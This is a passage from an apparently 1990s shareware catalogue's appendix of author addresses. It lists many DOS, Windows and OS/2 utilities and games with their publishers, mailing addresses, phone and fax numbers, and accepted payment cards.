Software Inc. + Address: 43 Rueter St., Nepean, Ontario K2J 3Z9 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 613-825-6271 + + Products: Report Utility for Paradox/DOS, Report Utility for + Paradox/DOS + Author: The C Group, Inc. [Mark Cohen] + Address: 1254 Rockaway Parkway, Ste. #252, Brooklyn, NY 11236 + Orders & queries: 718-251-1891 + Fax: 718-251-2059 + + Product: WinDatCon + Author: Vogel Scientific Software + Address: 1199 Leeward Ave., Lake Elmo, MN 55042-9643 + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Author: Jim Tolliver + Address: P.O. Box 4071, Stamford, CT 06907-0071 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 203-322-0298 + + Appendix A, "Author addresses" 734 + + + + Product: LPRINT + Author: Paragon Innovations, Inc. [Michael R. Wilkinson] + Address: 202 N. Allen Dr., Suite A, Allen, TX 75002 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 214-390-2965 + + Product: Notice Board + Author: Cornerstone Software Limited [Chris Tyler] + Address: 45 Shay Lane, Hale Barns, Altrincham, Cheshire WA15 + 8PA UNITED KINGDOM + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 01044-61-904-8145 + Queries: 01044-61-904-8143 + + Product: SQWEZ + Author: JM Software + Address: 568 Greenwich Ave., Paulsboro, NJ 08066 + Orders & queries: 609-423-1989 + + Products: WinClip, WinClip, WinClip, WinClip, WinClip, WinClip + Author: OsoSoft [George Campbell] + Address: 1472 Sixth Street, Los Osos, CA 93402 + Orders & queries: 805-528-1759 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 805-528-3074 + + Product: League Manager + Author: Al Dodd Software Co. + Address: 1615 Rachel Lane, Lakeland, FL 33805 + Orders & queries: 813-683-4210 + + Products: Local Access Logon, Local Access Logon + Author: M2w Software [Mart van Ineveld] + Address: Po.O box 8158, 3009 ad Rotterdam, THE NETHERLANDS + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +31-104568845 + + Product: DAZZLE + Author: Worldwide MicroTronics, Inc. + Address: P O Box 8759, Spring, TX 77387-8759 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-367-4333 + Queries: 713-298-1698 + + Appendix A, "Author addresses" 735 + + + + Products: TreeDraw, TreeDraw + Author: SpanSoft [Nick J Hunter] + Address: 11 Rowan Terrace, Cowdenbeath, Fife KY4 9JZ, SCOTLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +44-(0)1383-510597 + Queries: +44-(0)1383-510597 + + Products: Keyed File System (OS/2), Keyed File System (OS/2), + Keyed File System (OS/2), Keyed File System (OS/2) + Author: APT Computer Solutions, Inc. + Address: P.O. Box 47, Versailles, KY 40383-0047 + Orders & queries: 606-873-0589 + Accepts: MasterCard, Visa + + Products: A MUSICAL TUTORIAL for Windows, A MUSICAL TUTORIAL + for Windows + Author: R. Swerdfeger + Address: 3453 Marydale Ave., Cornwall, Ontario K6K 1P6 CANADA + Orders & queries: 613-933-7871 + + Product: wfListen + Author: Prodigy Computing + Address: PO Box 2194, Cramerview 2060 SOUTH AFRICA + Orders: 011-27-11-886-7122 (orders only, please) + Accepts: MasterCard, Visa + Fax: 011-27-11-888-2370 + + Product: Visual Calendar Planner + Author: Bok Nan Lo + Address: P.O. Box 9132, Reno, NV 89507 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + + Product: EDGEFLOW + Author: Pacestar Software [John Daleiden] + Address: P.O. Box 51974, Phoenix, AZ 85076-1974 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Calendar Quick + Author: Logic Pulse + Address: 1269 Sadler Cove Dr., Woodbine, GA 31569 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Z & Z Puzzle, Z & Z Puzzle + Author: Z & Z Software + Address: 1511 Norman Avenue, Lutherville, MD 21093 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6394 + Queries: 410-561-3891 + + Appendix A, "Author addresses" 736 + + + + Products: Yellow Sticky for Windows 3.1, Yellow Sticky for + Windows 3.1, Yellow Sticky for Windows 3.1, Yellow Sticky for + Windows 3.1, Yellow Sticky for Windows 3.1 + Author: Henning Associates [Michael R. Henning] + Address: Rt. 2, Box 526-A, Crozet, VA 22932-9518 + Orders: 800-823-6896 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 804-823-6896 + + Product: PROGRAM ENTITY ORGANIZER + Author: James W. Young & Associates, Inc. + Address: 1403 Fifth Street, Suite G, Davis, CA 95616 + Orders: 800-745-6903 (orders only, please) + Queries: 916-756-4976 + + Product: Edens-for-two + Author: Martlet, Inc. + Address: PO Box 37, Herndon, VA 22070 + Orders & queries: 703-435-5767 + + Product: Personal Finances 2 + Author: Spitfire Software + Address: 325 Breakwater Ridge, Atlanta, GA 30328 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 404-257-0187 + + Product: Music Sculptor for Windows + Author: Aleph Omega Software + Address: Box 61085 Kensington Postal Outlet, Calgary, Alberta + T2Z 1W8 CANADA + Orders: 800-2424-PSL (orders only, please) + Queries: 403-257-2115 + + Products: Finders Keepers, Finders Keepers, Finders Keepers, + Finders Keepers + Author: Glen DeBiasa + Address: 356 Gemini Drive, Apt. 4, Somerville, NJ 08876 + + Product: Seascape + Author: Advanced Computer Tektonics [Alan Walworth] + Address: 334 State Street, Suite 106, Los Altos, CA 94022 + Orders & queries: 415-424-1403 + + Product: TreePlan for DOS + Author: Decision Support Services [Michael R. Middleton] + Address: 2105 Buchanan Street #1, San Francisco, CA 94115 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-673-6217 + Queries: 415-673-6217 + + Appendix A, "Author addresses" 737 + + + + Products: Task Scheduler for DOS, Task Scheduler for DOS + Author: Simian Id Software [Don Branson] + Address: P.O. Box 430011, St. Louis, MO 63143 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 314-781-8709 + + Products: Thoroughbred Handicapper Pro, Thoroughbred + Handicapper Pro, Thoroughbred Handicapper Pro + Author: Whirlwind Technologies [James S Nixon] + Address: P.O. Box 1063, Van, TX 75790 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: CTS Serial Port Utilities, CTS Serial Port Utilities + Author: Computer Telecommunication Systems, Inc. [John Jerrim] + Address: 3847 Foxwood Road, Suite 1000, Duluth, GA 30136-6100 + Orders & queries: 404-263-8623 + Accepts: Discover, MasterCard, Visa + Fax: 404-263-0124 + + Product: EDITEUR + Author: Jean-Pierre Menicucci + Address: 18 rue de Brest, apt 243 - 35000, Rennes, FRANCE + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +33-9954-4273 + + Product: Image'n'Bits + Author: Bananas Software Inc + Address: 29 Engle Rd, Paramus, NJ 07652 + Orders & queries: 201-265-9855 + + Product: NewBase + Author: GWN Software [Gerald Manweiler] + Address: #17 Blueberry Drive, Whitecourt, Alberta T7S 1G7 + CANADA + Orders & queries: 403-778-5028 + + Product: Super!Market + Author: Trulli Tops Software, Inc. + Address: 7749 Ridgeway Dr., Mentor, OH 44060 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 216-974-5189 + + Product: REFILE + Author: MegAS Corporation + Address: 12401 Brookshire Parkway, Suite 200, Carmel, IN 46033 + Orders & queries: 317-844-6380 + + Product: CD-Box + Author: Jeffrey Belt + Address: 2A Crothers Hall, Stanford, CA 94305 + Queries: 415-497-5573 + + Appendix A, "Author addresses" 738 + + + + Product: CDPlayer for Windows and DOS + Author: Jupiter Software [Paul Brace] + Address: 63 Parkside, Wimbledon, London, SW19 5NL ENGLAND + Orders & queries: +44-081-946-4826 + Accepts: MasterCard, Visa + Fax: +44-081-879-0090 + + Product: New Testament for Windows + Author: Rocky Mountain Laboratories + Address: P.O. Box 272224, Fort Collins, CO 80527 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 303-669-2166 + Queries: 303-679-1662 + + Product: SysChk + Author: Advanced Personal Systems [Paul Griffith] + Address: 105 Serra Way, Suite 418, Milpitas, CA 95035 + Fax: 408-945-0242 + Queries: 408-298-3703 + + Products: RACONTEX, RACONTEX, RACONTEX + Author: Guy Software [Ed Guy, P.Eng, CDP] + Address: 1752 Duchess Avenue, West Vancouver, BC V7V 1P9 + CANADA + + Product: TOP + Author: TNC Technology [Tom Beikirch & Leon Williams] + Address: 1084 Webster Road, Webster, NY 14580 + Orders & queries: 716-872-1377 + Fax: 716-872-1377 + + Product: A Batch View + Author: Robin R. Latham + Address: P.O. Box 16152, Fort Worth, TX 76162 + Orders & queries: 817-263-4056 + Fax: N + + Product: Top Draw + Author: Top Software + Address: P.O. Box 1141, Conifer, CO 80433 + Orders & queries: 303-838-0384 + Accepts: MasterCard, Visa + Fax: 303-838-0384 + + Product: Schooner + Author: Jonathan Cook + Address: 7034 N. Cedar Ave. #108, Fresno, CA 93720 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 209-299-4958 + Queries: 209-299-4950 + + Appendix A, "Author addresses" 739 + + + + Products: TURBO TPU TOOLKIT!, TURBO TPU TOOLKIT! + Author: LONE WOLF ENTERPRISES [John A. Jackson] + rd + Address: 1507 E. 53 Street #438, Chicago, IL 60615 + Orders: 312-734-4549 (orders only, please) + + Products: QUIK-INSTALL, QUIK-INSTALL + Author: Michael L. Wester + Address: Route #6 Box 34, Fuquay-Varina, NC 27526 + Orders & queries: 919-552-0767 + Accepts: MasterCard, Visa + Fax: 919-362-8254 + + Products: Virus Simulator, Virus Simulator, Virus Simulator, + Virus Simulator, Virus Simulator, Virus Simulator + Author: Rosenthal Engineering [Doren Rosenthal] + Address: P.O.Box 1650, San Luis Obispo, CA 93406 + Queries: 805-541-0910 + + Products: Service Call Manager, Service Call Manager + Author: CPI computer services + Address: 325 Magnolia Way, Lemmon Valley, NV 89506 + Orders & queries: 702-329-6868 + Fax: 702-972-1659 + + Product: WINIMAGE + Author: Vollant Gilles + Address: 13, rue Mansart, 91540 Mennecy, FRANCE + + Product: CEnvi + Author: Nombas + Address: P.O. Box 875, Medford, MA 02155 + Orders & queries: 617-391-6595 + Accepts: + + Product: TreeChart + Author: FineLine Software + Address: Newtown, Kinvara, Co. Galway, IRELAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (+353)-91-37560 + Queries: (+353)-91-37560 + + Product: MicroCook + Author: NORSKi Software + Address: P.O. Box 76, Franksville, WI 53126-0076 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 414-632-9815 + + Appendix A, "Author addresses" 740 + + + + Products: Music and Video Librarian v3.8, Music and Video + Librarian v3.8 + Author: Alpine Software + Address: 3225 Dibrell Drive, Plano, TX 75023 + Orders & queries: 214-964-1897 + + Product: SCROLLit + Author: Bromfield Software Products + Address: P.O. Box 70081, Ottawa, Ontario, K2P 2M3 CANADA + + Products: Zippidy Do Da(tm), Zippidy Do Da(tm), Zippidy Do + Da(tm) + Author: SMI Corporation + Address: P.O. Box 582221, Tulsa, OK 74158 + Orders & queries: 918-241-2301 + Accepts: MasterCard, Visa + + Product: Winvelope + Author: Winvelope Software + Address: P.O. Box 1145, Jenkins, KY 41537-1145 + Accepts: MasterCard, Visa + Fax: 606-832-2493 + Queries: 606-832-2493 + + Products: COLOR CROSS, COLOR CROSS + Author: Cold Water Software [Gene Brown] + Address: P.O. Box 44421, Eden Prairie, MN 55344-1421 + Queries: 612-946-1987 + + Product: MotelMAX + Author: MKM Software + Address: 2812 Ingrid Lane, Metairie, LA 70003 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 504-885-7470 + + Product: RPMSHARE + Author: South Pointe Software + Address: 816 Peace Portal Drive, Suite 175, P.O. Box 880, + Blaine, WA 98231-0880 + Orders: 800-661-4480 (orders only, please) + Accepts: MasterCard, Visa + Fax: 604-538-3973 + Queries: 604-538-2326 + + Products: RexxBase, RexxBase + Author: American Coders, LTD. [Joseph R. McVerry] + Address: POB 97462, Raleigh, NC 27624 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 919-846-2014 + + Appendix A, "Author addresses" 741 + + + + Products: What-I-DID! for Windows, What-I-DID! for Windows + Author: Mission Critical Software [Dean L. Hiller] + Address: 14536 Island Drive, Sterling Hts, MI 48313 + Orders & queries: 313-247-0394 + Fax: 313-247-8444 + + Product: FONEFILE + Author: Business Enhancement Partnership Group + Address: 3410 F. La Sierra Ave., Suite #181, Riverside, CA + 92503 + Queries: 909-354-5251 + + Products: x-SKED3, x-SKED3, x-SKED3, x-SKED3, x-SKED3, x-SKED3, + x-SKED3, x-SKED3, x-SKED3, x-SKED3, x-SKED3, x-SKED3, x-SKED3 + Author: Extensions Software Corporation + Address: 1970 Osceola Parkway #350, Kissimmee, FL 34743 + Orders & queries: 407-344-3322 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 407-344-3323 + + Product: C-Menu/32 + Author: C-Vision [Mark J. Finocchio] + Address: 5866 Via Cuesta Dr., El Paso, TX 79912-6608 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 915-833-6778 + + Products: QIC-BAT for CMS, QIC-BAT for CMS + Author: Command Line Software [Douglas East] + Address: 3431 Florida Dr., Loveland, CO 80538 + Orders & queries: 970-667-4566 + Accepts: Discover, MasterCard, Visa + + Product: XFile + Author: Phase 33 Digital, Inc. + Address: 1346 Remsen Rd., Medina, OH 44256 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: ProAct Contact Management, ProAct Contact Management, + ProAct Contact Management + Author: ProDomus, Inc. [Philip S. Will] + Address: 16 Owen Street, Hartford, CT 06105 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 203-236-7954 + Queries: 203-233-0705 + + Product: Bigsort + Author: MeadowBrook Industries, Ltd. + Address: 450 Veterans Drive, Burlington, NJ 08016 + + Appendix A, "Author addresses" 742 + + + + Product: ViDir/ViRes File Monitor System + Author: Vahnzinn international + Address: 412 Norristown Road, Ambler, PA 19002-2737 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 215-643-6901 + + Product: Grafer Line Graphs for Reports + Author: Lovell's [Robert W. Lovell] + Address: 109 Amanda Drive, Anderson, SC 29621-2406 + Orders & queries: 803-224-2474 + + Product: You're Hired! + Author: DataWell + Address: 13712 James Avenue South, Burnsville, MN 55337-4340 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 612-894-7088 + + Products: Shareware Tracker, Shareware Tracker, Shareware + Tracker, Shareware Tracker, Shareware Tracker, Shareware + Tracker, Shareware Tracker, Shareware Tracker, Shareware + Tracker + Author: RMH Computer Services [Richard Holler] + Address: PO Box 657, Beech Grove, IN 46107-0657 + Orders & queries: 317-782-9903 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: SAB Diskette Utility + Author: Stewart A. Berman [Stewart Berman] + Address: 34 Adler Place, Suite B, Bronx, NY 10475-3901 + + Products: ZipInf VBX, ZipInf VBX, ZipInf VBX, ZipInf VBX, + ZipInf VBX, ZipInf VBX, ZipInf VBX, ZipInf VBX, ZipInf VBX, + ZipInf VBX, ZipInf VBX, ZipInf VBX, ZipInf VBX, ZipInf VBX, + ZipInf VBX + Author: Mabry Software [James Shields] + Address: P.O. Box 31926, Seattle, WA 98103-1926 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 206-632-0272 + Queries: 206-634-1443 + + Product: C xref + Author: DA Software + Address: 3717 Aldon Lane, Flint, MI 48506 + Orders: 800-444-5457 (orders only, please) + Accepts: MasterCard, Visa + Queries: 313-736-0239 + + Appendix A, "Author addresses" 743 + + + + Products: REMInder, REMInder + Author: Michael G. Bruckner + Address: 7936 Saddle Run, Powell, OH 43065 + Orders: 800-995-1605 (orders only, please) + Accepts: MasterCard, Visa + Queries: 614-761-2966 + + Product: Financial Analysis For Windows + Author: Gjetaas, Inc. [Russell C. Anderson] + Address: 7251 Mt. Baker Hwy, Deming, WA 98244 + Orders & queries: 360-599-2418 + Accepts: MasterCard, Visa + Fax: 360-599-1089 + + Product: WhizNotes + Author: Advanced Supprt Group, Inc. [Sanjay Kanade] + Address: 11900 Grant Place, Des Peres, MO 63131-4512 + Orders: 800-788-0787 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 314-966-1833 + Queries: 314-965-5630 + + Products: OpenHome, OpenHome + Author: Temprano Software + Address: 32 Leonardo Drive, Clifton Park, NY 12065-2038 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: MAGIC SQUARES + Author: Randy A. Harris + Address: Box #265 1336, North Moorpark Road, Thousand Oaks, CA + 91360 + + Product: THE MAGIC OF THE MIND + Author: Donald E.J. Field + Address: PO Box 11, Port Elliot, 5212 S Aust AUSTRALIA + + Appendix A, "Author addresses" 744 + + + + Product: Print Commander! + Author: Sorcerer Software [William Kneeland] + Address: 16311 Ventura Blvd., Suite #660, Encino, CA 91436 + Orders & queries: 310-454-8900 + Fax: 818-990-4432 + + Product: WinSecure + Author: ViewPoint Software, Inc. + Address: 20503 Yorba Linda Blvd., Ste 554, Yorba Linda, CA + 92686 + Orders & queries: 714-777-8362 + + Products: SmilerShell, SmilerShell + Author: Bardon Data Systems + Address: 1023 Key Route Blvd., Albany, CA 94706-2321 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 415-572-0620 + Queries: 510-526-8470 + + Products: J.T.S. TIME SHEETS, J.T.S. TIME SHEETS, J.T.S. TIME + SHEETS, J.T.S. TIME SHEETS, J.T.S. TIME SHEETS, J.T.S. TIME + SHEETS + Author: Easy Software [John Turnbull] + Address: 3 Brookside Court, Prestbury Road, Macclesfield, SK10 + 3BR UNITED KINGDOM + Orders & queries: 01625-614669 + Fax: 01625-614669 + + Product: WOWSpill + Author: World Of Windows Software + Address: 7112 Brookdale Court, Watauga, TX 76148 + + Appendix A, "Author addresses" 745 + + + + Product: Book-It + Author: Instinctive Systems Ltd + Address: 12 Alton Towers, 180 Withington Road, Manchester M16 + 8WA ENGLAND + Orders & queries: +44(0)161-861-0043 + Accepts: MasterCard, Visa + Fax: +44(0)161-861-0043 + + Product: ETCAI Electronics Instruction + Author: ETCAI Products [Charlie E. Ormon] + Address: P.O. Box 1046, Gautier, MS 39553 + Orders & queries: 601-497-2566 + Fax: 601-497-3868 + + Product: Universal Install + Author: The GoodSoft Co. + th + Address: 1630 30 Street, Suite 235, Boulder, CO 80301 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 303-444-0977 + Queries: 303-444-5747 + + Product: SuperFlow + Author: Advanced Technology Group, Inc. [Herbert Chow] + th + Address: 1139 W. 25 Street, Chicago, IL 60608 + Orders & queries: 312-225-8133 + Fax: 312-225-8406 + + Products: MultiVu, MultiVu, MultiVu + Author: Ivden Technologies, Inc. + Address: 87 Arbor Road, Churchville, PA 18966-1007 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 610-328-1145 + Queries: 610-328-1145 + + Products: Version Control & Maintenance, Version Control & + Maintenance, Version Control & Maintenance, Version Control & + Maintenance, Version Control & Maintenance, Version Control & + Maintenance, Version Control & Maintenance, Version Control & + Maintenance + Author: C & R Business Systems Ltd. [Dennis Allen] + Address: P.O. Box 8227, Grand Rapids, MI 49518-8227 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 616-281-9075 + Queries: 616-281-3333 + + Appendix A, "Author addresses" 746 + + + + Products: ZIP Fugue (Windows), ZIP Fugue (Windows), ZIP Fugue + (Windows), ZIP Fugue (Windows) + Author: Fugue Software + Address: P.O. Box 425, Capalaba, QLD 4157 AUSTRALIA + Orders & queries: +61-7-824-2843 + Accepts: MasterCard, Visa + Fax: +61-7-824-2843 + + Product: WizManager + Author: Mijenix + Address: 6666 Odana Road, Suite 326, Madison, WI 53719 + Orders: 800-242-4775 (orders only, please) + Accepts: + Fax: 608-277-1971 + Queries: 608-277-1971 + + Product: AstroFormulaCalculator 3 + Author: PCSCC, Inc. + Address: P. O. Box 173, Botsford, CT 06404-0173 + Orders & queries: 203-270-9079 + Accepts: MasterCard, Visa + + Product: PowerBBS for Windows + Author: PowerBBS Computing [Russell Frey] + Address: 35 Fox Ct.; Hicksville, NY 11801 + Orders: 800-242-4775 (orders only, please) + Accepts: + Fax: 713-524-6398 + Queries: 516-938-0506 + + Product: The Dialer + Author: GRH Software [Gary Heitz] + Address: 6266 Scotthille Drive S.E., Grand Rapids, MI + 49546-9608 + Queries: 616-676-2270 + + Products: The Complete Morph, The Complete Morph + Author: Hot Wax Software [Paul D. Nettle] + Address: 7054 Foxthorn Dr., Canton, MI 48187-3073 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 313-941-9223 + + Appendix A, "Author addresses" 747 + + + + Product: WinOCR + Author: SoftTech + Address: 24 Rosenthal Road, London, SE6 2BY UNITED KINGDOM + Orders & queries: 071-359-0405 + Fax: 071-539-0444 + + Product: LABELS-PLUS Labeling System + Author: GRAFTech Development Corporation + Address: P.O. Box 851228, Westland, MI 48185-6328 + Orders & queries: 517-487-2780 + Fax: 313-595-3180 + + Products: QuickDir, QuickDir + Author: SUPERWARE [Jim Olsen] + Address: PO Box 1291, Naugatuck, CT 06770 + Orders: 800-847-0309 (orders only, please) + Accepts: MasterCard, Visa + Fax: 203-723-0014 + Queries: 203-723-0014 + + Product: QCDRUN + Author: QUART, Inc. + Address: 2131 Hollywood Blvd. #505, Hollywood, FL 33020 + Orders & queries: 305-967-6853 + Fax: 305-967-6853 + + Product: DATA PROTECTOR + Author: PIGAS INC. + Address: 459 Columbus Ave. #314, New York, NY 10024 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: LOCATE + Author: System Solutions Company [Donald Ray Hutchins] + Address: 4409 Ansley Drive, Winston-Salem, NC 27107-7671 + Queries: 919-788-9656 + + Product: ChronoLog + Author: ComputerEase [Doug Patrick] + Address: 7204 John Elizabeth Place, Prince George, VA 23875 + Orders: 800-242-4775 (orders only, please) + Accepts: + Queries: 804-458-2212 + + Product: Simstat + Author: Provalis Research [Normand Pe'ladeau] + Address: 5000 Adam Street, Montreal, PQ, H1V 1W5 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 514-899-1672 + + Appendix A, "Author addresses" 748 + + + + Product: FINANCIAL WIZARD(tm) + Author: SilvaSoft Software, Inc. + Address: P.O. Box 3401, Kingsport, TN 37664-2020 + Orders & queries: 615-247-7551 + + Product: Golf Tournament Scorekeeper + Author: Home Alone Software + Address: 9630 100 Street, Edmonton, AB, T5K 0T6 CANADA + Orders: 800-995-1605 (orders only, please) + Accepts: MasterCard, Visa + Fax: 403-425-4404 + Queries: 403-425-4404 + + Products: Super Macro Library for 1-2-3, Super Macro Library + for 1-2-3 + Author: K.I.T.A.L. Software [Israel Kehaty] + Address: 17/1 Arbet Street, P.O. Box 748, Karmiel 20100 ISRAEL + Orders & queries: 972-498-7255 + + Product: SkyMap + Author: Christopher A. Marriott + Address: 9 Severn Road, Culcheth, Cheshire WA3 5ED, UNITED + KINGDOM + Orders: 800-622-2793 (orders only, please) + Accepts: MasterCard, Visa + Fax: 612-322-5871 + Queries: 612-322-5868 + + Products: PHRASE.ZIP, PHRASE.ZIP + Author: Larry W Parker + Address: 2049 Bunch Way, Carson, NV 89706 + + Appendix A, "Author addresses" 749 + + + + Products: UltiMenu, UltiMenu, UltiMenu + Author: Ron Janorkar + Address: 22 Prince Street, New York, NY 10012 + Orders & queries: 212-334-1243 + Fax: 212-334-1245 + + Products: CzarList for VBDOS, CzarList for VBDOS, CzarList for + VBDOS, CzarList for VBDOS + Author: CZAR Software [Thomas Jaeger] + Address: P.O. Box 370087, El Paso, TX 79937-0087 + Orders & queries: 915-595-8787 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 915-595-0721 + + Product: Cash Control + Author: Pipedream Software + Address: P.O. Box 6151, Grand Forks, ND 58206-6151 + Orders & queries: 701-746-0163 + Accepts: MasterCard, Visa + + Product: Timeclock I + Author: Faught Data Systems, Inc. + Address: P.O. Box 361927, Milpitas, CA 95035 + Orders & queries: 800-394-4839 + Accepts: + Fax: 408-263-2741 + + Product: SUNDAY SCHOOL COLORS + Author: Randall Alaimo + Address: 851 Bell Ave., Sacramento, CA 95838 + + Products: WonderBar, WonderBar + Author: Binary Systems [Larry Pendarvis] + Address: P.O. Box 1621, Brandon, FL 33509-1621 + + Product: Business Base + Author: CQ Research Corp [Greg Pickwell] + rd + Address: 3242 West 23 Avenue, Vancouver, B.C. V6L 1P8 CANADA + Orders & queries: 604-731-5583 + Accepts: MasterCard, Visa + Fax: 604-731-6063 + + Products: NFL Forecaster for Windows, NFL Forecaster for + Windows, NFL Forecaster for Windows, NFL Forecaster for Windows + Author: 100% Cotton Software + Address: RR 1 Box 1622, Hop Bottom, PA 18824 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 717-289-4019 + + Appendix A, "Author addresses" 750 + + + + Product: LinguaPro/SPANISH + Author: Schulenberg and Associates, Inc. [Craig W. Schulenberg] + Address: P.O. Box 1005, Houston, TX 77251-1005 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 713-440-4444 + + Product: 2DO Personal Task Manager + Author: William Anderson Consulting + st + Address: 13020 N. E. 71 Court, Kirkland, WA 98033 + Orders & queries: 206-828-3675 + + Products: Program for a Small Planet, Program for a Small + Planet, Program for a Small Planet + Author: Strat-Tech, Inc. + Address: P.O. Box 1957, Milwaukee, WI 53201 + Orders & queries: 800-783-9544 + Accepts: American Express, MasterCard, Optima, Visa + + Product: Drag and Drop Printing + Author: FLFSoft Inc. + Address: P.O. Box 306, Oak Creek, WI 53154-0306 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Puffer, Puffer + Author: Kent Briggs + Address: 109A Romana Circle, Hewitt, TX 76643 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Builder + Author: Aeolus Software + Address: P.O. Box 11915, St. Paul, MN 55119-0915 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 715-386-4182 + Queries: 612-730-4135 + + Products: Variable Investment Analyst, Variable Investment + Analyst + Author: Will Baldwin + Address: 8704 Broadmoor #806, Overland Park, KS 66212 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 913-381-9109 + Queries: 913-381-9109 + + Appendix A, "Author addresses" 751 + + + + Product: MAZEMAKER for Windows + Author: Custom Real-Time Software, Inc. (CRTS) + Address: P.O. Box 1106, West Caldwell, NJ 07007 + Orders & queries: 201-228-7623 + Fax: 201-228-7623 + + Products: VPT, VPT, VPT, VPT, VPT + Author: clySmic Software + Address: PO Box 2421, Empire State Plaza, Albany, NY 12220 + Orders: 800-2424-PSL (orders only, please) + Accepts: + Fax: 518-458-7476 + Queries: 518-438-5548 + + Product: FSLOGIN + Author: Confirm + Address: Ardechelaan 35, 6904 NG Zevenaar, THE NETHERLANDS + Orders: +31-8360-24988 (orders only, please) + Fax: +31-8360-41580 + + Product: FLUX + Author: MOONLITE Software + Address: P.O.Box 94, N. Aurora, IL 60542-0094 + + Products: LineDrive Fantasy Baseball, LineDrive Fantasy + Baseball, LineDrive Fantasy Baseball, LineDrive Fantasy + Baseball + Author: McS Custom Software + Address: PO Box 1032, Fortuna, CA 95540 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 707-725-6016 + + Products: WDN: Wipe Directory Names, WDN: Wipe Directory Names, + WDN: Wipe Directory Names, WDN: Wipe Directory Names, WDN: Wipe + Directory Names + Author: R.P.McCormick + Address: 79 Rye Street, Broad Brook, CT 06016-0079 + + Product: Vision Edit + Author: Andrzej Brzezinski + Address: P.O. Box 2657, Winnipeg Manitoba, R3C 4B3 CANADA + Orders & queries: 204-943-4020 + + Products: Windev - Windows NT Developer, Windev - Windows NT + Developer + Author: Helios Software Solutions + Address: Carr Brook House, Chorley Old Road, Brindle, Chorley, + Lancs. PR6 7QZ UNITED KINGDOM + Accepts: American Express, Discover, MasterCard, 